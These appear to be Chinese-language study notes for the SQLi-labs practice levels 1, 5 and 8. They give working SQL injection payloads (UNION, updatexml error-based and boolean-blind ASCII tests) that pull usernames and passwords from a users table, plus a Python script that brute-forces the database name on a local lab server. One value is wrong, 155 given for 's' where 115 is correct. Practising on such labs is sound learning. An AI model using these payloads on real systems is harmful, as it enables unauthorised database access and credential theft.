第一关
字符型注入
二分法猜字段
?id=1' order by 10;--+
?id=1' order by 3;--+
联合查询
?id=-1' union select 1,user(),database();--+
?id=-1' union select 1,2,group_concat(id,username,password) from users; --+
第五关
报错注入
?id=1' and updatexml(1,concat('~',(select user()),'~'),1)--+
?id=1' and updatexml(1,concat(0x7e,(select group_concat(username,0x3a,password)from users),0x7e),1)--+
?id=1' and updatexml(1,concat(0x7e,(select group_concat(column_name)from information_schema.columns where table_schema='security' and table_name='users'),0x7e),1)--+
分段查询(substr)
1-32字节
?id=1%27%20and%20updatexml(1,concat(0x7e,(select%20substr(group_concat(username,0x3a,password),1,32)from%20users),0x7e),1)--+
32-64字节
?id=1%27%20and%20updatexml(1,concat(0x7e,(select%20substr(group_concat(username,0x3a,password),32,64)from%20users),0x7e),1)--+
64-96字节
96-128字节
第八关
?id=1'
页面为真时显示You are in......... 页面为假时不显示
利用ASCII码查找
?id=1' and ascii(substr(database(),1,1))>100--+
?id=1' and ascii(substr(database(),1,1))>110--+
?id=1' and ascii(substr(database(),1,1))>120--+
?id=1' and ascii(substr(database(),1,1))>114--+
?id=1' and ascii(substr(database(),1,1))=115--+
第一行第一个字符ASCII=155(字母s)时为真 ,依此类推
python脚本
import requests
url = 'http://127.0.0.1/sqli/Less-8/index.php'
def inject_database(url):
name = ''
for i in range(1,20):
for j in range(32,129):
payload = "1' and ascii(substr(database(), %d, 1)) = %d-- " % (i, j)
res = {"id": payload}
r = requests.get(url, params=res)
if "You are in..........." in r.text:
name = name + chr(j)
print(name)
break
else:
continue
inject_database(url)